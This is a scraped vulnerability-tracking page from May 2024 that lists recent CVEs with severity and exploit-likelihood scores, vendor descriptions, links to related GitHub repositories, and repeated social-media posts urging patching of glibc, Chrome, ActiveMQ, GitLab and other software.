## Updated at UTC 2024-05-04T13:12:21.798812

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2024-2961 None 0.04% 13 1 2024-05-04T03:30:45 The iconv() function in the GNU C Library versions 2.39 and older may overflow t
CVE-2024-4368 0 0.04% 4 0 2024-05-04T02:15:06.853000 Use after free in Dawn in Google Chrome prior to 124.0.6367.118 allowed a remote
CVE-2024-4331 0 0.04% 4 0 2024-05-04T02:15:06.800000 Use after free in Picture In Picture in Google Chrome prior to 124.0.6367.118 al
CVE-2024-32114 8.5 0.04% 2 0 2024-05-03T17:47:08 In Apache ActiveMQ 6.x, the default configuration doesn't secure the API web con
CVE-2024-4060 0 0.04% 1 0 2024-05-03T04:15:09.620000 Use after free in Dawn in Google Chrome prior to 124.0.6367.78 allowed a remote
CVE-2024-4059 0 0.04% 1 0 2024-05-03T03:16:29.430000 Out of bounds read in V8 API in Google Chrome prior to 124.0.6367.78 allowed a r
CVE-2024-4058 0 0.04% 1 0 2024-05-03T03:16:29.387000 Type confusion in ANGLE in Google Chrome prior to 124.0.6367.78 allowed a remote
CVE-2023-48795 5.9 96.23% 2 1 template 2024-05-02T13:18:40 ### Summary Terrapin is a prefix truncation attack targeting the SSH protocol.
CVE-2023-7028 7.5 95.38% 8 11 template 2024-05-02T01:00:01.640000 An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 pr
CVE-2024-29011 7.5 0.04% 4 0 2024-05-01T21:30:46 Use of hard-coded password in the GMS ECM endpoint leading to authentication byp
CVE-2024-26305 9.8 0.04% 12 0 2024-05-01T19:50:25.633000 There is a buffer overflow vulnerability in the underlying Utility daemon that c
CVE-2024-20357 5.9 0.04% 4 0 2024-05-01T19:50:25.633000 A vulnerability in the XML service of Cisco IP Phone firmware could allow an una
CVE-2024-20376 7.5 0.04% 4 0 2024-05-01T18:31:25 A vulnerability in the web-based management interface of Cisco IP Phone firmware
CVE-2024-29010 7.1 0.04% 4 0 2024-05-01T18:31:20 The XML document processed in the GMS ECM URL endpoint is vulnerable to XML exte
CVE-2024-20378 7.5 0.04% 4 0 2024-05-01T18:31:19 A vulnerability in the web-based management interface of Cisco IP Phone firmware
CVE-2024-32462 8.4 0.04% 2 0 2024-05-01T18:15:24.140000 Flatpak is a system for building, distributing, and running sandboxed desktop ap
CVE-2024-1086 7.8 0.04% 1 3 2024-05-01T18:15:13.200000 A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables compon
CVE-2024-33511 9.8 0.04% 8 0 2024-05-01T15:30:44 There is a buffer overflow vulnerability in the underlying Automatic Reporting s
CVE-2024-33512 9.8 0.04% 4 0 2024-05-01T15:30:44 There is a buffer overflow vulnerability in the underlying Local User Authentica
CVE-2024-26304 9.8 0.04% 2 1 2024-05-01T15:30:37 There is a buffer overflow vulnerability in the underlying L2/L3 Management serv
CVE-2024-27322 8.8 0.04% 28 0 2024-04-29T21:30:34 Deserialization of untrusted data can occur in the R statistical programming lan
CVE-2024-27956 9.9 0.05% 1 3 template 2024-04-29T09:31:52 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2024-27124 7.5 0.04% 2 0 2024-04-26T15:32:22.523000 An OS command injection vulnerability has been reported to affect several QNAP o
CVE-2024-32764 9.9 0.04% 2 0 2024-04-26T15:32:22.523000 A missing authentication for critical function vulnerability has been reported t
CVE-2024-32766 10.0 0.04% 2 1 2024-04-26T15:30:39 An OS command injection vulnerability has been reported to affect several QNAP o
CVE-2024-4040 10.0 1.60% 27 9 2024-04-26T15:25:47.270000 A server side template injection vulnerability in CrushFTP in all versions befor
CVE-2024-20359 6.0 0.13% 54 2 2024-04-26T15:25:02.773000 A vulnerability in a legacy capability that allowed for the preloading of VPN cl
CVE-2024-20353 8.6 0.35% 52 2 2024-04-26T15:22:27.803000 A vulnerability in the management and VPN web servers for Cisco Adaptive Securit
CVE-2024-4006 4.3 0.04% 2 0 2024-04-25T17:25:05.903000 An issue has been discovered in GitLab CE/EE affecting all versions starting fro
CVE-2024-4024 7.3 0.04% 2 0 2024-04-25T15:30:38 An issue has been discovered in GitLab CE/EE affecting all versions starting fro
CVE-2024-2434 8.5 0.04% 2 0 2024-04-25T13:18:02.660000 An issue has been discovered in GitLab affecting all versions of GitLab CE/EE 1
CVE-2024-1347 4.3 0.04% 2 0 2024-04-25T12:30:56 An issue has been discovered in GitLab CE/EE affecting all versions before 16.9.
CVE-2024-2829 7.5 0.04% 2 0 2024-04-25T12:30:51 An issue has been discovered in GitLab CE/EE affecting all versions starting fro
CVE-2024-20358 6.0 0.04% 4 0 2024-04-24T21:31:56 A vulnerability in the Cisco Adaptive Security Appliance (ASA) restore functiona
CVE-2024-20356 8.7 0.04% 6 1 2024-04-24T21:31:56 A vulnerability in the web-based management interface of Cisco Integrated Manage
CVE-2024-3400 10.0 95.36% 39 33 template 2024-04-23T19:57:25.207000 A command injection as a result of arbitrary file creation vulnerability in the
CVE-2024-29003 7.5 0.04% 1 0 2024-04-23T15:30:35 The SolarWinds Platform was susceptible to a XSS vulnerability that affects the
CVE-2024-1480 7.5 0.04% 4 0 2024-04-22T13:28:43.747000 Unitronics Vision Standard line of controllers allow the Information Mode passwo
CVE-2024-28076 7.0 0.07% 2 0 2024-04-19T14:15:11.080000 The SolarWinds Platform was susceptible to a Arbitrary Open Redirection Vulnerab
CVE-2024-29001 7.5 0.04% 1 0 2024-04-18T09:30:53 A SolarWinds Platform SWQL Injection Vulnerability was identified in the user in
CVE-2024-28073 8.5 0.04% 1 0 2024-04-17T18:31:37 SolarWinds Serv-U was found to be susceptible to a Directory Traversal Remote Co
CVE-2024-22354 7.0 0.04% 2 0 2024-04-17T03:30:48 IBM WebSphere Application Server 8.5, 9.0 and IBM WebSphere Application Server
CVE-2024-21111 7.8 0.04% 4 1 2024-04-17T00:31:31 Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (comp
CVE-2024-31497 None 0.05% 4 2 2024-04-17T00:31:29 In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an
CVE-2024-1135 8.2 0.04% 2 0 2024-04-16T23:24:40 Gunicorn fails to properly validate Transfer-Encoding headers, leading to HTTP R
CVE-2024-3272 9.8 1.27% 4 1 2024-04-15T20:14:55.570000 ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very cr
CVE-2024-2279 8.7 0.04% 2 0 2024-04-12T03:30:44 An issue has been discovered in GitLab CE/EE affecting all versions starting fro
CVE-2024-3651 6.2 0.00% 2 0 2024-04-11T21:32:40 ### Impact A specially crafted argument to the `idna.encode()` function could co
CVE-2024-26198 8.8 0.53% 2 0 2024-04-11T21:30:50 Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2023-41266 8.2 85.11% 2 1 template 2024-04-11T21:06:16 A path traversal vulnerability found in Qlik Sense Enterprise for Windows for ve
CVE-2024-2604 6.3 0.04% 4 0 2024-04-11T01:25:29.777000 A vulnerability was found in SourceCodester File Manager App 1.0. It has been de
CVE-2024-26218 7.8 0.04% 6 1 2024-04-10T13:24:00.070000 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-2957 7.2 0.04% 2 0 2024-04-09T21:32:08 The Simple Ajax Chat – Add a Fast, Secure Chat Box plugin for WordPress is vulne
CVE-2024-29988 8.8 0.46% 2 1 2024-04-09T18:30:28 SmartScreen Prompt Security Feature Bypass Vulnerability
CVE-2023-42931 7.8 0.04% 2 1 2024-04-08T22:47:13.533000 The issue was addressed with improved checks. This issue is fixed in macOS Ventu
CVE-2024-3273 7.3 83.36% 2 8 template 2024-04-07T15:30:32 A vulnerability, which was classified as critical, was found in D-Link DNS-320L,
CVE-2023-41265 9.6 87.59% 2 1 template 2024-04-04T07:16:03 An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windo
CVE-2023-34362 9.8 95.56% 2 9 template 2024-04-04T04:29:06 In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.
CVE-2023-24932 6.7 13.87% 2 1 2024-04-04T03:56:20 Secure Boot Security Feature Bypass Vulnerability
CVE-2023-24796 9.8 0.33% 2 0 2024-04-04T03:41:35 Password vulnerability found in Vinga WR-AC1200 81.102.1.4370 and before allows
CVE-2024-2389 10.0 0.44% 15 26 template 2024-04-02T15:30:43 In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command inj
CVE-2023-44487 5.3 73.93% 2 12 2024-04-01T16:13:53 ## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to t
CVE-2024-3128 2.4 0.04% 1 0 2024-04-01T15:30:38 ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problem
CVE-2024-3094 10.0 10.08% 5 60 template 2024-03-29T18:30:50 Malicious code was discovered in the upstream tarballs of xz, starting with vers
CVE-2024-2887 None 0.04% 4 0 2024-03-29T06:30:30 Type Confusion in WebAssembly in Google Chrome prior to 123.0.6312.86 allowed a
CVE-2023-48788 9.8 56.22% 4 1 2024-03-26T01:00:02.003000 A improper neutralization of special elements used in an sql command ('sql injec
CVE-2024-27198 9.8 97.24% 2 9 template 2024-03-21T05:01:12 In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform
CVE-2024-21899 9.8 0.09% 2 0 2024-03-13T14:25:02.043000 An improper authentication vulnerability has been reported to affect several QNA
CVE-2024-21901 4.7 0.04% 2 0 2024-03-08T18:30:35 A SQL injection vulnerability has been reported to affect myQNAPcloud. If exploi
CVE-2024-21900 4.3 0.05% 2 0 2024-03-08T18:30:35 An injection vulnerability has been reported to affect several QNAP operating sy
CVE-2024-20345 6.5 0.04% 2 0 2024-03-07T13:52:27.110000 A vulnerability in the file upload functionality of Cisco AppDynamics Controller
CVE-2024-1708 8.5 0.05% 2 2 2024-02-22T15:30:39 ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner
CVE-2024-1212 10.0 0.21% 4 1 template 2024-02-21T18:31:06 Unauthenticated remote attackers can access the system through the LoadMaster ma
CVE-2023-50386 8.8 87.24% 2 1 2024-02-15T18:40:48.837000 Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of F
CVE-2024-21893 8.2 96.30% 2 4 template 2024-02-09T05:11:32 A server-side request forgery vulnerability in the SAML component of Ivanti Conn
CVE-2023-20198 10.0 87.33% 2 28 template 2024-02-03T05:07:29 Cisco is aware of active exploitation of a previously unknown vulnerability in t
CVE-2024-0204 9.8 53.86% 2 6 template 2024-02-02T18:30:29 Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauth
CVE-2024-21887 9.1 97.33% 2 12 template 2024-01-22T17:15:09.523000 A command injection vulnerability in web components of Ivanti Connect Secure (9.
CVE-2023-46805 8.2 96.56% 2 8 template 2024-01-22T17:15:09.080000 An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 2
CVE-2021-26887 7.8 0.06% 2 0 2023-12-29T20:15:55.393000

An elevation of privilege vulnerability exists in Microsoft Windows when Fold

CVE-2023-6448 9.8 6.84% 2 0 2023-12-19T15:30:29 Unitronics Vision Series PLCs and HMIs use default administrative passwords. An
CVE-2023-48365 9.6 0.08% 2 0 2023-12-08T05:05:23 Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthentica
CVE-2023-4474 9.8 0.10% 5 0 2023-12-06T02:15:07.187000 The improper neutralization of special elements in the WSGI server of the Zyxel
CVE-2023-4473 9.8 0.07% 5 0 2023-12-06T02:15:07.063000 A command injection vulnerability in the web server of the Zyxel NAS326 firmware
CVE-2023-46604 10.0 97.27% 2 26 template 2023-11-28T22:24:39 Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may all
CVE-2023-36396 7.8 0.11% 2 0 2023-11-20T18:04:21.453000 Windows Compressed Folder Remote Code Execution Vulnerability
CVE-2021-44228 10.0 97.56% 2 100 template 2023-11-07T03:39:36.897000 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12
CVE-2014-0160 7.5 97.48% 2 65 2023-11-07T02:18:10.590000 The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not p
CVE-2020-29583 9.8 96.25% 2 1 template 2023-11-05T05:04:43 Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyf
CVE-2023-38831 7.8 35.46% 4 43 2023-10-23T01:15:07.550000 RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user
CVE-2020-3259 7.5 1.93% 2 0 2023-08-16T18:30:19 A vulnerability in the web services interface of Cisco Adaptive Security Applian
CVE-2023-1389 8.8 6.88% 1 2 2023-08-11T15:15:09.760000 TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 conta
CVE-2021-26085 5.3 96.32% 4 2 template 2023-08-08T14:22:24.967000 Affected versions of Atlassian Confluence Server allow remote attackers to view
CVE-2023-32054 7.3 0.04% 2 0 2023-07-13T19:55:55.293000 Volume Shadow Copy Elevation of Privilege Vulnerability
CVE-2023-21746 7.8 0.04% 2 1 2023-04-27T19:15:14.917000 Windows NTLM Elevation of Privilege Vulnerability
CVE-2015-2051 0 97.14% 6 0 2023-04-26T19:27:52.350000 The D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earli
CVE-2022-37955 7.8 0.06% 2 0 2023-04-11T21:15:13.240000 Windows Group Policy Elevation of Privilege Vulnerability
CVE-2023-21036 5.5 0.04% 1 6 2023-04-06T05:08:38 In BitmapExport.java, there is a possible failure to truncate images due to a lo
CVE-2023-23397 9.8 92.64% 4 29 2023-03-29T05:07:23 Microsoft Outlook Elevation of Privilege Vulnerability
CVE-2022-38028 7.8 0.05% 15 0 2023-02-03T05:02:37 Windows Print Spooler Elevation of Privilege Vulnerability.
CVE-2017-8570 7.8 97.34% 4 9 2023-02-02T05:01:39 Microsoft Office allows a remote code execution vulnerability due to the way tha
CVE-2021-3129 9.8 97.46% 2 28 template 2023-02-01T05:05:19 Ignition before 2.5.2, as used in Laravel and other products, allows unauthentic
CVE-2006-4304 None 6.64% 4 0 2023-02-01T05:01:22 Buffer overflow in the sppp driver in FreeBSD 4.11 through 6.1, NetBSD 2.0 throu
CVE-2020-8657 None 16.36% 2 0 2023-01-29T05:01:16 An issue was discovered in EyesOfNetwork 5.3. The installation uses the same API
CVE-2022-26138 9.8 97.21% 2 4 template 2023-01-27T05:06:26 The Atlassian Questions For Confluence app for Confluence Server and Data Center
CVE-2021-21975 7.5 97.40% 4 10 template 2022-02-01T17:45:43.750000 Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975)
CVE-2018-13379 9.8 97.41% 4 12 template 2021-06-03T11:15:08.307000 An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal"
CVE-2024-28189 0 0.04% 6 0 N/A
CVE-2024-29021 0 0.04% 6 0 N/A
CVE-2024-33599 0 0.00% 8 0 N/A
CVE-2024-33600 0 0.00% 8 0 N/A
CVE-2024-33601 0 0.00% 8 0 N/A
CVE-2024-33602 0 0.00% 8 0 N/A
CVE-2024-28185 0 0.04% 4 0 N/A
CVE-2023-3824 0 0.08% 2 2 N/A
CVE-2024-202353 0 0.00% 2 0 N/A
CVE-2024-202359 0 0.00% 2 0 N/A
CVE-2024-27282 0 0.00% 3 0 N/A
CVE-2024-32657 0 0.04% 2 0 N/A
CVE-2023-42757 0 0.00% 2 0 N/A

CVE-2024-2961(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-05-04T03:30:45

13 posts

The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.

1 repos

https://github.com/mattaperkins/FIX-CVE-2024-2961

sambowne at 2024-04-24T22:59:34.686Z ##

CVE-2024-2961 - glibc Vulnerability Opens Door to PHP Attacks: Patch Immediately securityonline.info/cve-2024-2

##

thenewoil@mastodon.thenewoil.org at 2024-04-24T20:30:33.000Z ##

#glibc Vulnerability Opens Door to #PHP Attacks

securityonline.info/cve-2024-2

#cybersecurity #FOSS #CVE

##

soller@fosstodon.org at 2024-04-23T13:06:53.000Z ##

glibc iconv buffer overflow vulnerability that can be used for remote code execution on servers running PHP. Present for 24 years. This is the kind of stuff Rust was made for.

- openwall.com/lists/oss-securit
- nvd.nist.gov/vuln/detail/CVE-2
- rockylinux.org/news/glibc-vuln

##

bookstack@fosstodon.org at 2024-04-23T09:27:14.000Z ##

A vulnerability (CVE-2024-2961) that may affect PHP applications is receiving patches on many operating systems. It's advised to update & restart your systems where patches are available.

Ubuntu/Debian/Fedora appear to have patches available for supported systems. Rocky has some checking/workaround guidance here:

rockylinux.org/news/glibc-vuln

##

bobby@mastodon.sexypokemon.xyz at 2024-04-23T06:06:37.000Z ##

There is a new PHP vulnerability out. It is being tracked as CVE-2024-2961. Here’s a video explaining the vulnerability youtu.be/u8jLUjpCWrs?si=Fm1JSB #cve #vulnerability #hacking #php #linux #news #Security

##

sambowne@infosec.exchange at 2024-04-24T22:59:34.000Z ##

CVE-2024-2961 - glibc Vulnerability Opens Door to PHP Attacks: Patch Immediately securityonline.info/cve-2024-2

##

thenewoil@mastodon.thenewoil.org at 2024-04-24T20:30:33.000Z ##

#glibc Vulnerability Opens Door to #PHP Attacks

securityonline.info/cve-2024-2

#cybersecurity #FOSS #CVE

##

soller@fosstodon.org at 2024-04-23T13:06:53.000Z ##

glibc iconv buffer overflow vulnerability that can be used for remote code execution on servers running PHP. Present for 24 years. This is the kind of stuff Rust was made for.

- openwall.com/lists/oss-securit
- nvd.nist.gov/vuln/detail/CVE-2
- rockylinux.org/news/glibc-vuln

##

bookstack@fosstodon.org at 2024-04-23T09:27:14.000Z ##

A vulnerability (CVE-2024-2961) that may affect PHP applications is receiving patches on many operating systems. It's advised to update & restart your systems where patches are available.

Ubuntu/Debian/Fedora appear to have patches available for supported systems. Rocky has some checking/workaround guidance here:

rockylinux.org/news/glibc-vuln

##

bobby@mastodon.sexypokemon.xyz at 2024-04-23T06:06:37.000Z ##

There is a new PHP vulnerability out. It is being tracked as CVE-2024-2961. Here’s a video explaining the vulnerability youtu.be/u8jLUjpCWrs?si=Fm1JSB #cve #vulnerability #hacking #php #linux #news #Security

##

j3j5@hachyderm.io at 2024-04-21T21:42:42.000Z ##

tl;dr: upgrade glibc on your servers!

Summing it up, there's a vulnerability (CVE-2024-2961) on glibc that, apparently, can be used to get RCE on servers running PHP.
It's recommended that you update glibc to a patched version.

security-tracker.debian.org/tr
bugzilla.redhat.com/show_bug.c

There's an upcoming talk on May 10 where the researcher will explain how it was used to hack PHP servers.

offensivecon.org/speakers/2024

#PHP #glibc #iconv

##

j3j5@hachyderm.io at 2024-04-21T20:24:11.000Z ##

@ramsey it's this one CVE-2024-2961 security-tracker.debian.org/tr

##

cadey@pony.social at 2024-04-21T18:57:27.000Z ##

"No way to prevent this" say users of only language where this regularly happens

xeiaso.net/shitposts/no-way-to

##

CVE-2024-4368
(0 None)

EPSS: 0.04%

updated 2024-05-04T02:15:06.853000

4 posts

Use after free in Dawn in Google Chrome prior to 124.0.6367.118 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat at 2024-04-30T22:46:16.130Z ##

Google Chrome security advisory: Stable Channel Update for Desktop

  • CVE-2024-4331 (high severity) Use after free in Picture In Picture
  • CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-30T22:46:16.000Z ##

Google Chrome security advisory: Stable Channel Update for Desktop

  • CVE-2024-4331 (high severity) Use after free in Picture In Picture
  • CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

##

screaminggoat at 2024-04-30T22:46:16.130Z ##

Google Chrome security advisory: Stable Channel Update for Desktop

  • CVE-2024-4331 (high severity) Use after free in Picture In Picture
  • CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-30T22:46:16.000Z ##

Google Chrome security advisory: Stable Channel Update for Desktop

  • CVE-2024-4331 (high severity) Use after free in Picture In Picture
  • CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

##

CVE-2024-4331
(0 None)

EPSS: 0.04%

updated 2024-05-04T02:15:06.800000

4 posts

Use after free in Picture In Picture in Google Chrome prior to 124.0.6367.118 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat at 2024-04-30T22:46:16.130Z ##

Google Chrome security advisory: Stable Channel Update for Desktop

  • CVE-2024-4331 (high severity) Use after free in Picture In Picture
  • CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-30T22:46:16.000Z ##

Google Chrome security advisory: Stable Channel Update for Desktop

  • CVE-2024-4331 (high severity) Use after free in Picture In Picture
  • CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

##

screaminggoat at 2024-04-30T22:46:16.130Z ##

Google Chrome security advisory: Stable Channel Update for Desktop

  • CVE-2024-4331 (high severity) Use after free in Picture In Picture
  • CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-30T22:46:16.000Z ##

Google Chrome security advisory: Stable Channel Update for Desktop

  • CVE-2024-4331 (high severity) Use after free in Picture In Picture
  • CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

##

CVE-2024-32114
(8.5 HIGH)

EPSS: 0.04%

updated 2024-05-03T17:47:08

2 posts

In Apache ActiveMQ 6.x, the default configuration doesn't secure the API web context (where the Jolokia JMX REST API and the Message REST API are located). It means that anyone can use these layers without any required authentication. Potentially, anyone can interact with the broker (using Jolokia JMX REST API) and/or produce/consume messages or purge/delete destinations (using the Message REST AP

screaminggoat at 2024-05-03T14:21:32.468Z ##

Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application’s integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add authentication requirement (see advisory for details)

See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114

Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2024 (within 5 days). It is known to be exploited by ransomware groups.

##

screaminggoat@infosec.exchange at 2024-05-03T14:21:32.000Z ##

Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application’s integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add authentication requirement (see advisory for details)

See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114

Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2024 (within 5 days). It is known to be exploited by ransomware groups.

#CVE_2024_32114 #Apache #ActiveMQ #Vulnerability

##

CVE-2024-4060
(0 None)

EPSS: 0.04%

updated 2024-05-03T04:15:09.620000

1 posts

Use after free in Dawn in Google Chrome prior to 124.0.6367.78 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat at 2024-04-24T11:21:29.621Z ##

Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 chromereleases.googleblog.com/

  • CVE-2024-4058 (critical) Type Confusion in ANGLE
  • CVE-2024-4059 (high) Out of bounds read in V8 API
  • CVE-2024-4060 (high) Use after free in Dawn

##

CVE-2024-4059
(0 None)

EPSS: 0.04%

updated 2024-05-03T03:16:29.430000

1 posts

Out of bounds read in V8 API in Google Chrome prior to 124.0.6367.78 allowed a remote attacker to leak cross-site data via a crafted HTML page. (Chromium security severity: High)

screaminggoat at 2024-04-24T11:21:29.621Z ##

Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 chromereleases.googleblog.com/

  • CVE-2024-4058 (critical) Type Confusion in ANGLE
  • CVE-2024-4059 (high) Out of bounds read in V8 API
  • CVE-2024-4060 (high) Use after free in Dawn

##

CVE-2024-4058
(0 None)

EPSS: 0.04%

updated 2024-05-03T03:16:29.387000

1 posts

Type confusion in ANGLE in Google Chrome prior to 124.0.6367.78 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)

screaminggoat at 2024-04-24T11:21:29.621Z ##

Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 chromereleases.googleblog.com/

  • CVE-2024-4058 (critical) Type Confusion in ANGLE
  • CVE-2024-4059 (high) Out of bounds read in V8 API
  • CVE-2024-4060 (high) Use after free in Dawn

##

CVE-2023-48795
(5.9 MEDIUM)

EPSS: 96.23%

updated 2024-05-02T13:18:40

2 posts

### Summary Terrapin is a prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it. ### Mitigations

Nuclei template

1 repos

https://github.com/RUB-NDS/Terrapin-Artifacts

screaminggoat at 2024-04-22T18:00:56.737Z ##

Jenkins security advisory from 17 April 2024 patched against the Terrapin Attack vulnerability CVE-2023-48795 🔗 jenkins.io/security/advisory/2

##

simontsui@infosec.exchange at 2024-04-22T18:00:56.000Z ##

Jenkins security advisory from 17 April 2024 patched against the Terrapin Attack vulnerability CVE-2023-48795 🔗 jenkins.io/security/advisory/2

#CVE_2023_48795 #Terrapin #vulnerability #Jenkins

##

CVE-2023-7028
(7.5 HIGH)

EPSS: 95.38%

updated 2024-05-02T01:00:01.640000

8 posts

An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.

Nuclei template

11 repos

https://github.com/yoryio/CVE-2023-7028

https://github.com/thanhlam-attt/CVE-2023-7028

https://github.com/hackeremmen/gitlab-exploit

https://github.com/Trackflaw/CVE-2023-7028-Docker

https://github.com/Vozec/CVE-2023-7028

https://github.com/RandomRobbieBF/CVE-2023-7028

https://github.com/V1lu0/CVE-2023-7028

https://github.com/Esonhugh/gitlab_honeypot

https://github.com/mochammadrafi/CVE-2023-7028

https://github.com/Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab

https://github.com/duy-31/CVE-2023-7028

richi@vmst.io at 2024-05-03T17:15:27.000Z ##

The U.S. Cybersecurity and Infrastructure Security Agency (#CISA) warns #GitLab users of a 100-day-old, maximum severity vulnerability.

#CVE20237028 has a perfect CVSS score of 10. In #SBBlogwatch, we double-check our versions. At @TechstrongGroup’s @SecurityBlvd: securityboulevard.com/2024/05/

##

screaminggoat at 2024-05-01T15:33:20.196Z ##

CISA: CISA Adds One Known Exploited Vulnerability to Catalog
HOT OFF THE PRESS! CISA adds CVE-2023-7028 (10.0 critical, disclosed 12 January 2024 by GitLab) GitLab Community and Enterprise Editions Improper Access Control Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog!

Why you should care about CVE-2023-7028:

This is a zero-click account takeover that people were freaking out about less than 4 months ago. Successful exploitation allows attackers to send password reset emails for a targeted account to an attacker-controlled email address, allowing the threat actor to change the password and take over the account.

cc: @campuscodi @serghei @todb

##

screaminggoat@infosec.exchange at 2024-05-01T15:33:20.000Z ##

CISA: CISA Adds One Known Exploited Vulnerability to Catalog
HOT OFF THE PRESS! CISA adds CVE-2023-7028 (10.0 critical, disclosed 12 January 2024 by GitLab) GitLab Community and Enterprise Editions Improper Access Control Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog!

Why you should care about CVE-2023-7028:

This is a zero-click account takeover that people were freaking out about less than 4 months ago. Successful exploitation allows attackers to send password reset emails for a targeted account to an attacker-controlled email address, allowing the threat actor to change the password and take over the account.

cc: @campuscodi @serghei @todb

#kev #eitw #knownexploitedvulnerabilitiescatalog #vulnerability #CVE_2023_7028

##

jos1264@social.skynetcloud.site at 2024-05-02T21:45:03.000Z ##

GitLab Password Reset Vulnerability (CVE-2023-7028) fortiguard.fortinet.com/threat

##

decio at 2024-05-02T07:06:38.190Z ##

